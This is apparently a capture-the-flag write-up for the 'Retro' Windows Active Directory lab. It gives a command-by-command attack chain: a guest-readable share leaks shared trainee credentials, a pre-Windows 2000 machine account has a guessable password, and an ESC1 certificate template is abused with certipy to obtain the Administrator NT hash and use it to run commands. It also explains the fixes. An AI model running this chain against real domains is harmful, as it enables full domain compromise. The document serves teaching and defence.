- OS: Windows AD (Server 2022)
- Domain:
retro.vl
Summary
Retro is an Easy Windows Active Directory box that chains three distinct misconfigurations. The first is organizational: the domain has a shared trainee account whose credentials are openly documented in an SMB share readable by anonymous guests. That pattern — shared kiosk or training accounts with well-known passwords — is common in environments where operational convenience wins over security hygiene.
The second is a legacy configuration artifact. A machine account called BANKING$ was pre-created with the “pre-Windows 2000 compatible” option, which causes Active Directory to set the initial password to the lowercase hostname. Although SMB authentication rejects a machine account that has not joined a domain properly (returning STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT), the Kerberos KDC still issues a TGT for that account. That TGT is enough to interact with ADCS as a domain computer principal.
The third is a certificate template misconfiguration classified as ESC1: the RetroClients template allows Domain Computers to enroll, permits the enrollee to supply an arbitrary Subject Alternative Name, and carries the Client Authentication extended key usage. Those three properties together mean any domain computer — including BANKING$ — can request a certificate asserting the identity of any principal in the domain, including Administrator. Certipy converts that certificate into an NT hash via PKINIT, and the hash grants full domain access.
Recon
netexec smb <DC> # Windows Server 2022, domain retro.vl
netexec smb <DC> -u guest -p '' --shares # Trainees (READ), Notes (no access as guest)
smbclient //<DC>/Trainees -U guest% # Important.txt: shared trainee account
netexec smb <DC> -u trainee -p trainee # VALID
Anonymous SMB enumeration immediately reveals two non-default shares. Trainees is guest-readable, which is unusual — most domain controllers do not expose custom shares to unauthenticated users. The file inside (Important.txt) documents a shared training account, giving away both the username and a trivially guessable password. This is the first sign that operational convenience has been prioritized over least-privilege access.
smbclient //<DC>/Notes -U trainee%trainee
# user.txt + ToDo.txt (mentions BANKING$ pre-created computer account)
With trainee credentials the Notes share becomes readable. It contains user.txt directly and a ToDo.txt that explicitly references a pre-created computer account named BANKING$. That file is both the user flag and an in-band hint pointing to the next step: the domain has a machine account created with legacy compatibility settings that has not been cleaned up.
Foothold — pre-Win2000 BANKING$
RID brute-force through the trainee account finds BANKING$ at a non-standard RID, confirming it exists as a real domain object. The pre-Windows 2000 compatible creation process sets the machine account’s initial password to the lowercase hostname, so the password for BANKING$ is simply banking. SMB authentication fails — the workstation trust flag was never set — but the Kerberos KDC validates the password independently and issues a TGT regardless of workstation trust status.
netexec smb <DC> -u trainee -p trainee --rid-brute 5000 | grep '\$'
# BANKING$ at RID 1106
getTGT.py -dc-ip <DC> 'retro.vl/BANKING$:banking'
# Saves BANKING$.ccache — Kerberos TGT issued even though SMB gives NOLOGON_WORKSTATION_TRUST
export KRB5CCNAME=BANKING$.ccache
User Flag
user.txt is not behind a shell — it lives directly in the Notes SMB share and is readable as soon as trainee:trainee credentials are established. No code execution is required:
smbclient //<DC>/Notes -U trainee%trainee -c 'get user.txt'
This is deliberate box design: the user flag is available the moment you enumerate your way into a valid low-privilege identity, before exploitation begins. The flag is owned by the share’s configuration, not by a logged-in user’s desktop.
Privesc — ESC1 (RetroClients template)
Certipy enumeration with the BANKING$ TGT finds the RetroClients template flagged as ESC1: Domain Computers can enroll, the enrollee supplies the Subject, and the Client Authentication EKU is set. The key-size 4096 requirement is enforced by the template — certificates with shorter keys are rejected.
certipy-ad find -k -no-pass -dc-ip <DC> -target dc.retro.vl -vulnerable
# RetroClients template — ESC1 confirmed
# Get Administrator SID
lookupsid.py retro.vl/trainee:trainee@<DC> 500
# Request cert with SID embedded (required for modern certipy auth)
certipy-ad req -k -no-pass -dc-ip <DC> -target dc.retro.vl -dc-host DC.retro.vl \
-ca retro-DC-CA -template RetroClients -upn [email protected] \
-key-size 4096 -sid <admin-SID>
certipy-ad auth -pfx administrator.pfx -domain retro.vl -dc-ip <DC>
# → Administrator NT hash
netexec smb <DC> -u Administrator -H <NT-hash> -x 'type C:\Users\Administrator\Desktop\root.txt'
Important nuances
- No password change needed:
getTGT.pywith the pre-Win2000 password works directly. SMB login fails (NOLOGON_WORKSTATION_TRUST) but Kerberos TGT issuance succeeds independently. -sidflag is mandatory: Certipy v5 auth fails with “Object SID mismatch” if the cert doesn’t contain the user’s object SID. Pass-sid <admin-SID>toreq.-dc-hostrequired for Kerberos req: Without-dc-host, certipy times out on the NETBIOS resolution step when using Kerberos authentication.
Why each step worked
Shared trainee account. Active Directory gives every authenticated domain user a baseline level of trust: they can read shares, enumerate objects, and interact with domain services. When an organization collapses multiple people into one shared account, a single disclosure — a sticky note, a chat message, a file left world-readable — compromises every resource that account can reach. The Important.txt file in the guest-readable share illustrates how operational shortcuts in training environments become standing vulnerabilities: the account persists, the password never rotates, and the breadcrumb never gets cleaned up.
Pre-Windows 2000 compatibility password. When a computer account is created with the “pre-Windows 2000 compatible” checkbox, Active Directory sets the initial password to the lowercase version of the NetBIOS machine name. This behavior is documented and exists for backward compatibility with older systems that could not negotiate a randomized password during domain join. The account BANKING$ was never actually joined to the domain — its workstation trust flag was never upgraded — so SMB authentication correctly rejects it. But the Kerberos KDC validates the password independently and issues a TGT regardless of workstation trust status. That TGT is a Kerberos identity for a domain computer principal, which is exactly what ADCS enrollment checks against.
ESC1 certificate template abuse. ADCS ESC1 occurs when three conditions align: the template allows a non-administrative principal to enroll, the template permits the enrollee to specify an arbitrary Subject Alternative Name (SAN), and the resulting certificate is valid for Client Authentication. When all three are true, any enrollee can assert the identity of any other account in the directory — including Domain Admins — simply by naming that account in the certificate request. The RetroClients template grants enrollment rights to Domain Computers, so BANKING$ satisfies that check. Certipy embeds the target account’s object SID in the certificate (required in modern environments to prevent SID-spoofing mismatches), then uses PKINIT to authenticate as Administrator and retrieve the NT hash.
Counterfactuals
Replacing the shared trainee account with individual per-trainee accounts, each with a unique password and a short expiry, closes the first link in the chain. Without a known reusable credential, an attacker cannot move from unauthenticated SMB guest access to domain user enumeration. Removing guest read access from the Trainees share eliminates even the ability to find the account name.
Auditing pre-Windows 2000 compatible machine accounts and either deleting them or randomizing their passwords removes the Kerberos-only foothold. Specifically, accounts with WORKSTATION_TRUST_ACCOUNT status that have never completed a domain join should either be deleted or have their password set to a random 120-character value via Set-ADAccountPassword. The predictable default password is the entire reason BANKING$ is exploitable.
For the certificate template, disabling “Enrollee Supplies Subject” on RetroClients and moving to a Subject built from Active Directory attributes removes the ability to request certificates for arbitrary identities. Additionally, restricting enrollment rights to specific named service accounts — rather than the broad Domain Computers group — means a compromised machine account cannot enroll at all. Either change alone would have broken the ESC1 condition.
Key Takeaways
- Guest-readable SMB shares on a DC are high-value recon targets: they often contain credentials or hints written for legitimate users that attackers can read equally well.
- A machine account TGT is enough to drive ADCS enrollment — SMB authentication failure does not mean Kerberos is closed.
- ESC1 requires three simultaneous conditions; auditing for any one of them (enrollment rights, SAN control, Client Auth EKU) is enough to catch the class.
- The
-sidflag incertipy reqis mandatory in modern environments: without the object SID embedded in the certificate, authentication fails with a SID mismatch error even if the certificate itself is valid.
References
- Prior reconstruction from: 0xdf “HTB: Retro”, IppSec video walkthrough